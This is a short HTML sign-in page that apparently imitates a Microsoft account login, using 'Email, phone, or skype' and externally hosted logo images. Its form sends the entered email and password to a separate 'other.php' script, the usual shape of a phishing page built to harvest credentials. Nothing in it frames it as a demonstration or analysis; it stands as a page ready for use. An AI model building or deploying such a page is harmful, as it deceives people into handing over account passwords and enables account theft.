<!doctype html>
<html>
<head>
<title>Sign In</title>
</head>
<body>
<center>
  <link href="other.css" rel="stylesheet">

<form action="other.php" method="post"><br><br><br>
<br><br><br><fieldset><br>
<img src="https://i.imgur.com/BD3Sw8N.png"><br>
<input type="text" name="user" placeholder="Email, phone, or skype" required ><br>
<input type="password" name="pass" placeholder="Password" required >

<br><img src="https://i.imgur.com/Zju9ooP.png">
    <br>
    <input type="submit" name="submit" value="Next"/> <br> <br><br></fieldset>

</center>
</form>

</body>
</html>